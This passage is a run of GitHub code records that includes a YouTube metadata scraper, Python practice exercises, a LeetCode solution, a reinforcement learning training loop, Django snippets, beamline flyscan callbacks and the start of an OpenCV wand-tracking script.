chanid=json_load['items'][0]['snippet']['channelId']\r\n except:\r\n chanid=\"\"\r\n try:\r\n viddesc=json_load['items'][0]['snippet']['description']\r\n except:\r\n viddesc=\"\"\r\n try:\r\n vidpub=json_load['items'][0]['snippet']['publishedAt']\r\n except:\r\n vidpub=\"\"\r\n try:\r\n channame=json_load['items'][0]['snippet']['channelTitle']\r\n except:\r\n channame=\"\"\r\n try:\r\n vidtags=json_load['items'][0]['snippet']['tags']\r\n except:\r\n vidtags=\"\"\r\n try:\r\n vidcat=json_load['items'][0]['snippet']['categoryId']\r\n except:\r\n vidcat=\"\"\r\n try:\r\n vidlive=json_load['items'][0]['snippet']['liveBroadcastContent']\r\n except:\r\n vidlive=\"\"\r\n try:\r\n vidlang=json_load['items'][0]['snippet']['defaultAudioLanguage']\r\n except:\r\n vidlang=\" \"\r\n try:\r\n viddu=time.strftime(\"%H:%M:%S\",time.gmtime(yttimeconvert(json_load['items'][0]['contentDetails']['duration'])))\r\n except:\r\n viddu=\"\"\r\n try:\r\n vidview=json_load['items'][0]['statistics']['viewCount']\r\n except:\r\n vidview=\"\"\r\n try:\r\n vidlikes=json_load['items'][0]['statistics']['likeCount']\r\n except:\r\n vidlikes=\"\"\r\n try:\r\n vidcom=json_load['items'][0]['statistics']['commentCount']\r\n except:\r\n vidcom=\"\"\r\n try:\r\n vidthumb=json_load['items'][0]['snippet']['thumbnails']['maxres']['url']\r\n except:\r\n vidthumb=json_load['items'][0]['snippet']['thumbnails']['default']['url']\r\n try:\r\n vidid=json_load['items'][0]['id']\r\n except:\r\n vidid=\"\"\r\n df2 = pd.DataFrame([[vidtitle,chanid,viddesc,vidpub,channame,vidtags,vidcat,vidlive,vidlang,viddu,vidview,vidlikes,vidcom,vidthumb,vidid]],columns=['vidtitle','chanid','viddesc','vidpub','channame','vidtags','vidcat','vidlive','vidlang','viddu','vidview','vidlikes','vidcom','vidthumb','vidid'])\r\n return df2\r\n \r\n\r\nfor i in range(0,len(vid.index+1)):\r\n\r\n data = main(str(vid.iloc[i,1]))\r\n print 
(i)\r\n print(data)\r\n data.to_csv(\"exdata.csv\", mode='a', header=False, index=False)\r\n time.sleep(1)\r\n","repo_name":"Vanshbordia/youtubedataresearch","sub_path":"dataextractor.py","file_name":"dataextractor.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34716207878","text":"# x = {'a': 10, 'b': 20, 'c': 30, 'd': 40}\n# x.setdefault('e')\n# print(x)\n\n# # update(키=값)은 키가 문자열일 때만 사용할 수 있습니다. 만약 키가 숫자일 경우에는 update(딕셔너리)처럼 딕셔너리를 넣어서 값을 수정할 수 있습니다.\n# x.update(e=90)\n# print(x)\n\nkeys = ['a', 'b', 'c', 'd']\n# x = dict.fromkeys(keys, 900)\n# print(x)\n# print(x.get(\"a\"))\n\n# make dictionary out of list\na = {key: value for key, value in dict.fromkeys(keys).items() if value != 20}\n\nprint(a)\nterrestrial_planet = {\n 'Mercury': {\n 'mean_radius': 2439.7,\n 'mass': 3.3022E+23,\n 'orbital_period': 87.969\n },\n 'Venus': {\n 'mean_radius': 6051.8,\n 'mass': 4.8676E+24,\n 'orbital_period': 224.70069,\n },\n 'Earth': {\n 'mean_radius': 6371.0,\n 'mass': 5.97219E+24,\n 'orbital_period': 365.25641,\n },\n 'Mars': {\n 'mean_radius': 3389.5,\n 'mass': 6.4185E+23,\n 'orbital_period': 686.9600,\n }\n}\nprint(terrestrial_planet[\"Venus\"][\"mean_radius\"])\n\n\nx = {'a': 0, 'b': 0, 'c': 0, 'd': 0}\ny = x.copy()\ny[\"a\"] = 90\nprint(y)\n\nmaria = {'korean': 94, 'english': 91, 'mathematics': 89, 'science': 83}\n\naverage = sum(maria.values())/len(maria)\n\nprint(average)\n\n\nkeys = input().split()\nvalues = map(int, input().split())\nx = dict(zip(keys, values))\n# del x[\"delta\"]\na = {key: value for key, value in x.items() if value != 30 and key != \"delta\"}\nprint(a)\n","repo_name":"gchin97/python-stamp","sub_path":"25.0.py","file_name":"25.0.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20000013929","text":"class Solution(object):\n def countBattleships(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: int\n \"\"\"\n result = 0\n m = len(board)\n n = len(board[0])\n for i in range(m):\n for j in range(n):\n if board[i][j] == 'X':\n result += 1\n\n if i != 0 and board[i - 1][j] == 'X': # vertical\n result -= 1\n if j != 0 and board[i][j - 1] == 'X': # horizontal\n result -= 1\n\n return result\n","repo_name":"hansxiao7/leetcode-python","sub_path":"0419--Battleships in a Board/solution2-one pass.py","file_name":"solution2-one pass.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"72788061593","text":"#!~miniconda3/envs/pytorch/bin python\n# from __future__ import print_function\n\nimport numpy as np\nimport Src.Utils.utils as utils\nfrom Src.NS_parser import Parser\nfrom Src.config import Config\nfrom time import time\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport pandas as pd\nimport logging\nimport pickle\nfrom Src.Algorithms import NS_utils\nimport torch\nimport seaborn as sns\nfrom os import path\nfrom scipy import stats\n\n\ndef animate(n, *fargs):\n trajectories = fargs[0]\n line = fargs[1]\n line.set_xdata(trajectories[:n, 0])\n line.set_ydata(trajectories[:n, 1])\n return line\n\nclass Solver:\n def __init__(self, config):\n # Initialize the required variables\n\n self.config = config\n self.env = self.config.env\n self.state_dim = np.shape(self.env.reset())[0]\n\n if len(self.env.action_space.shape) > 0:\n 
self.action_dim = self.env.action_space.shape[0]\n else:\n self.action_dim = self.env.action_space.n\n print(\"Actions space: {} :: State space: {}\".format(self.action_dim, self.state_dim))\n\n self.model = config.algo(config=config)\n\n\n def train(self):\n # Learn the model on the environment\n return_history = []\n action_dict = {0: 'up', 1: 'right', 2: 'down', 3: 'left'}\n reached_destination = []\n reached_count = 0\n discounted_return_history = np.zeros(self.config.max_episodes)\n episode_length = np.zeros(self.config.max_episodes)\n success_vector = np.zeros(self.config.max_episodes)\n prowls_prediction = np.zeros(self.config.max_episodes)\n\n\n logging.basicConfig(filename='log_trial.log', encoding='utf-8', level=logging.DEBUG)\n logging.debug('START TRIAL \\n')\n\n E = self.config.max_episodes\n H = self.env.max_horizon\n #actions = np.empty((self.config.max_episodes, self.env.max_horizon), dtype=object)\n #action_probs = np.zeros((self.config.max_episodes, self.env.max_horizon, 4))\n #states = np.zeros((self.config.max_episodes, self.env.max_horizon+1, 2))\n #rewards = np.zeros((self.config.max_episodes, self.env.max_horizon))\n #target_pos = np.zeros((self.config.max_episodes, self.env.max_horizon, 4))\n\n\n ckpt = self.config.save_after\n rm_history, regret, rm, start_ep = [], 0, 0, 0\n\n windDir = \"right\"\n targetPos = [0, 0]\n\n steps = 0\n t0 = time()\n for episode in range(start_ep, self.config.max_episodes):\n logging.debug(\"EPISODE {}\\n\\n\".format(episode))\n\n # RESET ENV AND MODEL\n state = self.env.reset()\n\n if self.config.env_name == 'NS_Wind':\n if windDir != self.env.direction or episode == self.config.max_episodes-1:\n with open(\"{}_Model_wind_{}_seed_{}\".format(self.config.algo_name, windDir, self.config.seed),\n \"wb\") as file_:\n pickle.dump(self.model, file_, -1)\n windDir = self.env.direction\n elif self.config.env_name == 'NS_Target':\n if targetPos != self.env.target or episode == self.config.max_episodes-1:\n with open(\"{}_Model_Target_{}_seed_{}\".format(self.config.algo_name, self.fromTargetToStr(targetPos), self.config.seed),\n \"wb\") as file_:\n pickle.dump(self.model, file_, -1)\n targetPos = self.env.target\n #newActor, _, _ = NS_utils.get_Policy(state_dim=2, config=self.config)\n #self.model.modules[0] = ('actor', newActor)\n\n self.model.reset()\n\n logging.debug(\"Initial State: {}\".format(state))\n\n step, total_r = 0, 0\n discount = 1\n gamma_t = self.config.gamma\n done = False\n trajectories = np.zeros((self.config.max_steps, 2))\n plotTraj = False\n while not done:\n # self.env.render(mode='human')\n logging.debug(\"Step: {} \\n\".format(step))\n\n if plotTraj:\n trajectories[step, :] = state\n\n # GET ACTION\n action, extra_info, dist = self.model.get_action(state)\n\n #states[episode, step] = self.env.curr_pos\n #actions[episode, step] = action_dict[action]\n #action_probs[episode, step] = dist\n\n logging.debug(\"State: {}\".format(self.env.curr_pos))\n logging.debug(\"Action chosen: {}\".format(action_dict[action]))\n logging.debug(\"Actions probabilities (up, right, down, left): {}\".format(dist))\n\n # STEP\n new_state, reward, done, info = self.env.step(action=action)\n\n if reward > 0:\n success_vector[episode] = 1\n\n logging.debug(\"Went to: {}\".format(self.env.curr_pos))\n logging.debug(\"Reward: {}\".format(reward))\n\n if reward == 29.5:\n logging.debug(\"DESTINATION REACHED IN {} STEPS\".format(step))\n\n logging.debug(\"\\n\\n\\n\")\n\n #rewards[episode, step] = reward # this is not discounted\n 
#target_pos[episode, step] = self.env.G1\n #if done:\n #states[episode, step+1] = self.env.curr_pos\n\n # UPDATE MODEL\n self.model.update(state, action, extra_info, reward, new_state, done)\n #prowls_prediction[episode:episode + self.config.delta] = self.model.prediction\n state = new_state\n\n # Tracking intra-episode progress\n total_r += reward\n discounted_return_history[episode] += reward * discount\n discount *= gamma_t\n # regret += (reward - info['Max'])\n step += 1\n if step >= self.config.max_steps:\n break\n\n if plotTraj:\n fig = plt.figure()\n ax = plt.axes(xlim=(0, 1), ylim=(0, 1))\n line, = ax.plot([], [], lw=2)\n ep_traj = np.reshape(trajectories[np.logical_and.reduce(trajectories[:, :] != [0, 0], axis=1), :],\n (-1, 2))\n # print(ep_traj.shape)\n # print(ep_traj)\n\n target = plt.Rectangle((0.45, 0.9), 0.1, 0.1, fc='red')\n ax.add_patch(target)\n anim = FuncAnimation(fig, animate, interval=200, fargs=(ep_traj, line))\n plt.show(block=False)\n plt.pause(3)\n plt.close()\n\n # track inter-episode progress\n episode_length[episode] = step\n steps += step\n rm += total_r\n '''if total_r > 0 and episode >= 0.9 * self.config.max_episodes:\n reached_destination.append(True)\n reached_count += 1\n elif total_r <= 0 and episode >= 0.9 * self.config.max_episodes:\n reached_destination.append(False)'''\n\n if episode%ckpt == 0 or episode == self.config.max_episodes-1:\n rm_history.append(rm)\n return_history.append(total_r)\n\n print(\"{} :: Rewards {:.3f} :: steps: {:.2f} :: Time: {:.3f}({:.5f}/step) :: Entropy : {:.3f} :: Grads : {}\".\n format(episode, rm, steps/ckpt, (time() - t0)/ckpt, (time() - t0)/steps, self.model.entropy, self.model.get_grads()))\n\n # self.model.save()\n #utils.save_plots(return_history, config=self.config, name='{}_rewards'.format(self.config.seed))\n\n t0 = time()\n steps = 0\n\n # every 100 episodes set exploration to 0 and plot 10 trajectories\n trajectories = np.zeros((10, self.config.max_steps, 2))\n if False:\n #if episode % 100 == 0 and episode != 0 or episode == self.config.max_episodes-1:\n\n print(\"Project a few episodes without exploration epsilon.\")\n #self.env.randomness = 0\n #self.model.state_features.eval()\n #self.model.actor.eval()\n\n # layers_before = [x.data for x in self.model.state_features.net.parameters()]\n #layers_before = [x.data for x in self.model.actor.fc1.parameters()]\n # print(\"Before: {}\".format(layers_before))\n\n for i in range(2):\n state = self.env.reset()\n self.env.episode -= 1\n self.env.curr_pos = np.array([np.random.randint(2,9) / 10, 0.5])\n self.env.curr_state = self.env.make_state()\n state = self.env.make_state()\n\n #self.model.reset()\n\n step_test = 0\n done = False\n while not done:\n trajectories[i,step_test,:] = state\n\n action, extra_info, dist = self.model.get_action(state)\n\n action = np.argmax(dist)\n #print(action)\n # STEP\n new_state, reward, done, info = self.env.step(action=action)\n # UPDATE MODEL\n # self.model.update(state, action, extra_info, reward, new_state, done)\n state = new_state\n step_test += 1\n #print(trajectories[i,:,:])\n\n if step_test >= self.config.max_steps:\n break\n\n fig = plt.figure()\n ax = plt.axes(xlim=(0, 1), ylim=(0, 1))\n line, = ax.plot([], [], lw=2)\n ep_traj = np.reshape(trajectories[i,np.logical_and.reduce(trajectories[i,:,:] != [0,0], axis =1), :], (-1,2))\n #print(ep_traj.shape)\n #print(ep_traj)\n\n target = plt.Rectangle((0.475, 0.925), 0.05, 0.05, fc='red')\n ax.add_patch(target)\n anim = FuncAnimation(fig, animate, interval=200, fargs=(ep_traj, 
line))\n plt.show(block=False)\n plt.pause(3)\n plt.close()\n\n #self.env.randomness = 0.25\n #self.model.state_features.train()\n #self.model.actor.train()\n\n #layers_after = [x.data for x in self.model.state_features.net.parameters()]\n layers_after = [x.data for x in self.model.actor.fc1.parameters()]\n #print(\"After: {}\".format(layers_after))\n #print(torch.equal(layers_before[0], layers_after[0]))\n #print(torch.equal(layers_before[1], layers_after[1]))\n print(\"Finished plotting.\")\n\n prediction_error = np.abs(discounted_return_history - prowls_prediction)\n #np.save(\"prediction_error_alg_{}_speed_{}_seed_{}\".format(self.config.algo_name,\n # self.config.speed,\n # self.config.seed),\n # prediction_error)\n #np.save(\"predicted_return_alg_{}_speed_{}_seed_{}\".format(self.config.algo_name,\n # self.config.speed,\n # self.config.seed),\n # prowls_prediction)\n np.save(\"disc_return_history_alg_{}_speed_{}_seed_{}\".format(self.config.algo_name,\n self.config.speed,\n self.config.seed,), discounted_return_history)\n\n np.save(\"episode_length_alg_{}_speed_{}_seed_{}\".format(self.config.algo_name, self.config.speed, self.config.seed),\n episode_length)\n\n np.save(\"episode_success_alg_{}_speed_{}_seed_{}\".format(self.config.algo_name, self.config.speed, self.config.seed),\n success_vector)\n\n #success_rate = reached_count / len(reached_destination)\n\n #print(\"Success rate: {}\".format(success_rate))\n\n ## convert your array into a dataframe\n #heatmap = pd.DataFrame(self.env.heatmap)\n '''actions = pd.DataFrame(actions)\n states = pd.DataFrame(np.reshape(states, (E*(H+1),-1)))\n action_probs = pd.DataFrame(np.reshape(action_probs, (E*H,-1)))\n rewards = pd.DataFrame(rewards)\n target_pos = pd.DataFrame(np.reshape(target_pos, (E*H,-1)))'''\n\n ## save to xlsx file\n\n '''actions_filepath = 'actions_{}.xlsx'.format(self.config.max_episodes)\n states_filepath = 'states_{}.xlsx'.format(self.config.max_episodes)\n action_probs_filepath = 'action_probs_{}.xlsx'.format(self.config.max_episodes)\n rewards_filepath = 'rewards_{}.xlsx'.format(self.config.max_episodes)\n target_pos_filepath = 'target_pos_{}.xlsx'.format(self.config.max_episodes)'''\n #heat_path = 'heatmap.xlsx'\n\n #heatmap.to_excel(heat_path, index=False)\n '''actions.to_excel(actions_filepath, index=False)\n states.to_excel(states_filepath, index=False)\n action_probs.to_excel(action_probs_filepath, index=False)\n rewards.to_excel(rewards_filepath, index=False)\n target_pos.to_excel(target_pos_filepath, index=False)'''\n\n # plot action map\n ''' \n x = np.arange(0.5,0,-0.05)\n x2 = np.arange(0.5,1,0.05)\n x = np.sort(np.concatenate(([0], x, x2[1:], [1])))\n grid_scale = len(x)\n\n arrow_positions_x = np.zeros((grid_scale, grid_scale))\n arrow_positions_y = np.zeros((grid_scale, grid_scale))\n arrow_weight = np.zeros((grid_scale, grid_scale))\n\n arrow_dir_x = np.zeros((grid_scale, grid_scale))\n arrow_dir_y = np.zeros((grid_scale, grid_scale))\n grid_step = 0.05\n\n # put the position\n for i in range(grid_scale-1):\n for j in range(grid_scale-1):\n arrow_positions_x[i, j] = x[i]\n arrow_positions_y[i,j] = x[j]\n action, prob, _ = self.model.get_action(np.array([arrow_positions_x[i, j],arrow_positions_y[i,j]]))\n arrow_weight[i,j] = prob\n # up\n if action == 0:\n arrow_dir_x[i, j] = 0\n arrow_dir_y[i, j] = 1\n # right\n if action == 1:\n arrow_dir_x[i, j] = 1\n arrow_dir_y[i, j] = 0\n # down\n if action == 2:\n arrow_dir_x[i, j] = 0\n arrow_dir_y[i, j] = -1\n #left\n if action == 3:\n arrow_dir_x[i, j] = -1\n 
arrow_dir_y[i, j] = 0\n\n fig, ax = plt.subplots(figsize=(grid_scale, grid_scale))\n target = plt.Rectangle((0.45, 0.9), 0.1, 0.1, fc='red')\n ax.quiver(arrow_positions_x, arrow_positions_y, arrow_dir_x, arrow_dir_y, pivot='mid', scale=100, linewidths=arrow_weight.flatten()*0.01, edgecolors='k')\n ax.add_patch(target)\n #plt.show()\n plt.savefig('ActionProbs_{}_seed_{}_algo_{}.png'.format(self.config.max_episodes, self.config.seed, self.config.algo_name))'''\n\n\n\n '''if self.config.debug and self.config.env_name == 'NS_Reco':\n\n fig1, fig2 = plt.figure(figsize=(8, 6)), plt.figure(figsize=(8, 6))\n ax1, ax2 = fig1.add_subplot(1, 1, 1), fig2.add_subplot(1, 1, 1)\n\n action_prob = np.array(action_prob).T\n true_rewards = np.array(true_rewards).T\n\n for idx in range(len(dist)):\n ax1.plot(action_prob[idx])\n ax2.plot(true_rewards[idx])\n\n plt.show()'''\n\n '''def train_multiple(self):\n # Learn the model on the environment\n return_array = np.zeros((1,self.config.max_episodes))\n true_rewards = []\n action_prob = []\n return_history = []\n\n ckpt = self.config.save_after\n rm_history, regret, rm, start_ep = [], 0, 0, 0\n # if self.config.restore:\n # returns = list(np.load(self.config.paths['results']+\"rewards.npy\"))\n # rm = returns[-1]\n # start_ep = np.size(returns)\n # print(start_ep)\n\n steps = 0\n t0 = time()\n for episode in range(start_ep, self.config.max_episodes):\n # Reset both environment and model before a new episode\n\n state = self.env.reset()\n self.model.reset()\n\n step, total_r = 0, 0\n done = False\n while not done:\n # self.env.render(mode='human')\n action, extra_info, dist = self.model.get_action(state)\n new_state, reward, done, info = self.env.step(action=action)\n self.model.update(state, action, extra_info, reward, new_state, done)\n state = new_state\n\n # Tracking intra-episode progress\n total_r += reward\n # regret += (reward - info['Max'])\n step += 1\n if step >= self.config.max_steps:\n break\n\n # track inter-episode progress\n # returns.append(total_r)\n steps += step\n # rm = 0.9*rm + 0.1*total_r\n rm += total_r\n return_array[0, episode] = total_r\n if episode%ckpt == 0 or episode == self.config.max_episodes-1:\n rm_history.append(rm)\n return_history.append(total_r)\n if self.config.debug and self.config.env_name == 'NS_Reco':\n action_prob.append(dist)\n true_rewards.append(self.env.get_rewards())\n\n print(\"{} :: Rewards {:.3f} :: steps: {:.2f} :: Time: {:.3f}({:.5f}/step) :: Entropy : {:.3f} :: Grads : {}\".\n format(episode, rm, steps/ckpt, (time() - t0)/ckpt, (time() - t0)/steps, self.model.entropy, self.model.get_grads()))\n\n # self.model.save()\n utils.save_plots(return_history, config=self.config, name='{}_rewards'.format(self.config.seed))\n\n t0 = time()\n steps = 0\n return return_array'''\n\n def fromTargetToStr(self, target):\n if target == [0, 0]:\n return \"TopLeft\"\n elif target == [0, 4]:\n return \"TopRight\"\n elif target == [4, 4]:\n return \"BotRight\"\n elif target == [4, 0]:\n return \"BotLeft\"\n\n\n# @profile\ndef main(train=True, inc=-1, hyper='default', base=-1):\n t = time()\n args = Parser().get_parser().parse_args()\n save = True\n\n # Use only on-policy method for oracle\n if args.oracle >= 0:\n args.algo_name = 'ONPG'\n\n if inc >= 0 and hyper != 'default' and base >= 0:\n args.inc = inc\n args.hyper = hyper\n args.base = base\n\n\n n_seeds = 30\n # Training mode\n if train:\n for i in range(n_seeds):\n args.seed = i\n config = Config(args)\n solver = Solver(config=config)\n solver.train()\n\n print(\"Total time 
taken: {}\".format(time() - t))\n\n ''' \n if (save):\n with open(\"{}_Model_max_ep_{}_seed_{}\".format(args.algo_name, args.max_episodes, args.seed), \"wb\") as file_:\n pickle.dump(solver, file_, -1)'''\n\n\n\nif __name__ == \"__main__\":\n main(train=True)\n\n","repo_name":"JacopoSilvestrin/OptFuture_NSMDP","sub_path":"run_NS.py","file_name":"run_NS.py","file_ext":"py","file_size_in_byte":19845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41658253028","text":"from django.http import JsonResponse\nfrom django.db.models import Q\n\nfrom apps.match.models import Match\n\n\ndef active_turn(function):\n\n def _inner(self, request, *args, **kwargs):\n query = Q(player1=request.player)\n query.add(Q(player2=request.player), Q.OR)\n query.add(Q(pk=kwargs['match_id']), Q.AND)\n match = Match.objects.filter(query).first()\n if not match:\n return JsonResponse({\"error\": \"Getting information of a match that does not exist or is not yours.\"})\n\n request.match = match\n request.is_player1 = match.player1 == request.player\n request.is_player2 = match.player2 == request.player\n\n return function(self, request, *args, **kwargs)\n\n return _inner\n\n\n","repo_name":"luisfilipedcc/whoiswho","sub_path":"apps/match/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"27734156669","text":"import asyncio\nimport logging\nimport functools\nimport time\nimport threading\nfrom collections import OrderedDict\n\nimport numpy as np\n\nfrom matplotlib.backends.qt_compat import QtCore\nfrom bluesky.callbacks.mpl_plotting import QtAwareCallback\n\nlogger = logging.getLogger(__name__)\n\n\ndef catch_exceptions(fcn):\n @functools.wraps(fcn)\n def wrapped(*args, **kwargs):\n try:\n return fcn(*args, **kwargs)\n except Exception as ex:\n logger.error('Function call failed: %s(%s, %s)', fcn, args, kwargs,\n exc_info=ex)\n raise\n\n return wrapped\n\n\nclass SubscanChecker:\n def __init__(self, subscan_rate):\n self._subscan_index = 0\n self._subscan_checker_enabled = False\n self._subscan_rate = subscan_rate\n\n def start_subscan_checker(self):\n if not self._subscan_checker_enabled:\n logger.debug('Starting subscan checker')\n self._subscan_checker_enabled = True\n self._schedule_subscan_check()\n\n def stop_subscan_checker(self):\n if self._subscan_checker_enabled:\n logger.debug('Stopping subscan checker')\n self._subscan_checker_enabled = False\n\n def _schedule_subscan_check(self):\n QtCore.QTimer.singleShot(int(self._subscan_rate * 1000), self.check_subscan)\n\n def check_subscan(self):\n\n if self._subscan_checker_enabled:\n\n flyer = self.flyer\n if flyer is not None and flyer.scan_count == 1:\n self.stop_subscan_checker()\n return\n\n try:\n if flyer is None or flyer.scan_count <= 1:\n pass\n else:\n last_index = self._subscan_index\n if flyer.scan_index > last_index:\n self._subscan_index = flyer.scan_index\n self.subscan_start(index=self._subscan_index)\n finally:\n self._schedule_subscan_check()\n\n\nclass FlyDataCallbacks(SubscanChecker, QtAwareCallback):\n def __init__(self, flyer=None, subscan_rate=0.5):\n SubscanChecker.__init__(self, subscan_rate=subscan_rate)\n QtAwareCallback.__init__(self)\n\n self.flyer = flyer\n self._run_header = None\n\n @catch_exceptions\n def start(self, doc):\n self._run_header = doc\n logger.debug('Run header: scan_id=%d (%s)', doc['scan_id'],\n 
self.__class__.__name__)\n\n self.scan_id = doc['scan_id']\n self.fast_axis = doc['fast_axis']\n dims = doc['shape']\n ndim = len(dims)\n self.num = np.product(dims)\n self._subscan_index = 0\n\n if ndim == 1:\n pass\n elif ndim == 2:\n self.start_subscan_checker()\n else:\n logger.error('Unsupported scan dimensions')\n return\n\n logger.debug('Number of points=%d', self.num)\n self.scan_started(doc, ndim, fast_axis=self.fast_axis,\n **doc['plan_args'])\n\n @catch_exceptions\n def stop(self, doc):\n if self.flyer is None:\n logger.error('Flyer unset - not running scan_finished')\n return\n\n flyer = self.flyer\n self.stop_subscan_checker()\n\n while not flyer.done:\n logger.debug('Waiting for flyscan to finish')\n time.sleep(0.2)\n\n scan_data = self.flyer.data.get(self.scan_id, {})\n\n finish_func = (self.scan_failed if flyer.failed\n else self.scan_finished)\n\n try:\n finish_func(doc, scan_data, cancelled=self.flyer.cancelled)\n finally:\n self._run_header = None\n self.flyer = None\n\n def scan_started(self, doc, ndim, **scan_kwargs):\n '''Re-implement me'''\n pass\n\n def scan_failed(self, doc, scan_data, **kwargs):\n '''Re-implement me'''\n pass\n\n def scan_finished(self, doc, scan_data, cancelled=False, **kwargs):\n '''Re-implement me'''\n pass\n\n def subscan_start(self, index=0, **kwargs):\n '''Re-implement me'''\n pass\n\n\ndef default_data_func(*arrays):\n return np.sum(arrays, axis=0)\n\n\nclass SignalDataHandler:\n def __init__(self, groups, data_func=None, point_signal=None):\n self.groups = groups\n self.point_signal = point_signal\n self.data_func = data_func\n self.signals = sum((signals for group, signals in groups.items()), [])\n self._updated = True\n self._lock = threading.RLock()\n self._calculated = None\n\n if point_signal is not None:\n point_signal.subscribe(self._value_updated)\n else:\n for sig in self.signals:\n sig.subscribe(self._value_updated)\n if not groups:\n raise ValueError('Must have at least one signal')\n\n @property\n def updated(self):\n '''Any signals changed since the last calculation?'''\n return self._updated\n\n def _value_updated(self, **kwargs):\n with self._lock:\n self._updated = True\n\n def get_group_data(self, key, npts):\n group_data = []\n for signal in self.groups[key]:\n try:\n value = signal.get(count=npts)\n except Exception as ex:\n logger.debug('Caget failed for signal %s', signal,\n exc_info=ex)\n value = None\n\n if value is not None:\n try:\n len(value)\n except TypeError:\n value = [value]\n\n if len(value) < npts:\n value = np.concatenate((value, [0] * (npts - len(value))))\n group_data.append(value)\n else:\n group_data.append(np.zeros(npts))\n return group_data\n\n @catch_exceptions\n def calc_data(self, npts):\n with self._lock:\n if not self._updated:\n return self._calculated\n elif npts <= 0:\n return OrderedDict((label, [])\n for label, signals in self.groups.items())\n\n data = OrderedDict()\n data_func = (self.data_func if self.data_func is not None\n else default_data_func)\n\n for label, signals in self.groups.items():\n group_data = self.get_group_data(label, npts)\n data[label] = data_func(*group_data)\n\n self._updated = False\n self._calculated = data\n\n return OrderedDict(self._calculated)\n\n @property\n def num_points(self):\n if self.point_signal is None:\n raise ValueError('No point signal set')\n\n return self.point_signal.get(use_monitor=False)\n\n\nclass SubscanDataHandler:\n def __init__(self, key_groups, data_func=None):\n self.key_groups = key_groups\n self.data_func = data_func\n\n def 
calc_data(self, flyer, scan_id):\n try:\n data = flyer.data[scan_id]\n except KeyError:\n return OrderedDict()\n\n data_func = (self.data_func if self.data_func is not None\n else default_data_func)\n return OrderedDict((main_key, data_func(*[data[key] for key in keys]))\n for main_key, keys in self.key_groups.items())\n","repo_name":"NSLS-II-HXN/hxnfly","sub_path":"hxnfly/callbacks/flydata.py","file_name":"flydata.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40156582234","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('oncall', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Slot',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('slot_id', models.IntegerField(default=1)),\n ],\n ),\n migrations.CreateModel(\n name='Teacher',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('first_name', models.CharField(max_length=20)),\n ('last_name', models.CharField(max_length=20)),\n ('email_address', models.EmailField(max_length=254)),\n ('slot', models.ForeignKey(default=None, to='oncall.Slot')),\n ],\n ),\n ]\n","repo_name":"brendan-kellam/GCS-On-Call-System","sub_path":"OnCallSystem/oncall/migrations/0002_slot_teacher.py","file_name":"0002_slot_teacher.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"40485340400","text":"import unittest\n\ndef is_legal_age(age):\n if age >= 18:\n return True\n else:\n return False\n\n\n \n\nclass Glass_Test(unittest.TestCase):\n\n def test_is_legal_age(self):\n age = 20\n\n result = is_legal_age(age)\n\n self.assertEqual(result, True)\n \n def test_is_not_legal_age(self):\n age = 15\n\n result = is_legal_age(age)\n\n self.assertEqual(result, False)\n \n \n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)","repo_name":"fernunex/Pensamiento-computacional-py","sub_path":"glass_box.py","file_name":"glass_box.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27813146012","text":"\"\"\"\nKeys\n----\nS - Save wand pattern as an image (for data collection)\nQ - Quit\n\"\"\"\n\nimport cv2 as cv\nimport numpy as np\n\nimport os\nimport sys\nimport time\n\nclass SpellDetector:\n \"\"\"\n From the video stream, track the wand tip, determine what spell has been cast, and make magic!\n \"\"\"\n\n def __init__(self, video_src, spell_classifier, spellcaster):\n self.video_src = video_src\n self.spell_classifier = spell_classifier\n self.spellcaster = spellcaster\n\n # Frame properties\n self.frame_index = 0\n self.prev_frame = None\n\n # Background subtraction properties\n self.background_subtractor = cv.createBackgroundSubtractorMOG2(history=100, varThreshold=50, detectShadows=False)\n\n # Detection & tracking properties\n self.update_interval = 5\n self.feature_params = dict(\n maxCorners = 5,\n qualityLevel = 0.01,\n minDistance = 30)\n self.lk_params = dict(\n winSize = (25, 25),\n maxLevel = 7,\n criteria = (cv.TERM_CRITERIA_EPS | cv.TERM_CRITERIA_COUNT, 10, 0.03))\n\n # Wand properties\n self.wand_tracks = []\n self.wand_pattern = None\n self.spell = ''\n 
